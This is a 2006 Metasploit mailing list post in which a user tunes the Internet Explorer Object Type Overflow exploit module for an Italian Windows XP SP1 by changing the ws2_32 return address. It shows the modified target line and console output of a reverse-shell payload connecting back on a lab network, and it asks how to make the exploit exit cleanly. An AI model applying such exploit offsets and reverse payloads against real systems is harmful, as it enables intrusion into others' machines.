Metasploit mailing list archives
Internet Explorer Object Type Overflow
From: buffer at softmedia.info (Angelo Dell'Aera)
Date: Wed, 31 May 2006 11:17:33 +0200
Hello, first of all I have to say I'm not a real expert in the Windows world. While trying to exploit Internet Explorer Object Type Overflow on a host running Windows XP Professional SP1 through Metasploit I realized that the ws2_32 push esp/ret (which is located at 0x71ab1d54 for the English version) is located at 0x71a31d54 for the Italian version thus I modified the ie_objecttype.pm this way "Windows XP" => [ 0x71a31d54, 0x7ffdec50 ], # ws2_32 push esp/ret SP0/1 When I tried to exploit the vulnerable host I saw IE crashing and on the attacker's side this behavior... msf ie_objecttype(win32_reverse) > exploit [*] Starting Reverse Handler. [*] Waiting for connections to http://192.168.33.162:8080 ... [*] HTTP Client connected from 192.168.33.107:1392 using Windows XP, sending payload... [*] Got connection from 192.168.33.162:4321 <-> 192.168.33.107:1393 [*] Exiting Reverse Handler. I tried attaching iexplore.exe with ollydbg and observed an access violation when writing to the address 0x77e40000 (this address is in ECX and EBX when the access violation is triggered). I suppose I'll need to modify even the second address in the target array in order to exit in a clean way but I'm really not skilled in the Windows world and so hints about how to do it are really welcome. Regards, -- Angelo Dell'Aera 'buffer' Antifork Research, Inc. http://buffer.antifork.org Metro Olografix PGP information in e-mail header
Current thread:
- Internet Explorer Object Type Overflow Angelo Dell'Aera (May 31)
- Internet Explorer Object Type Overflow Jerome Athias (May 31)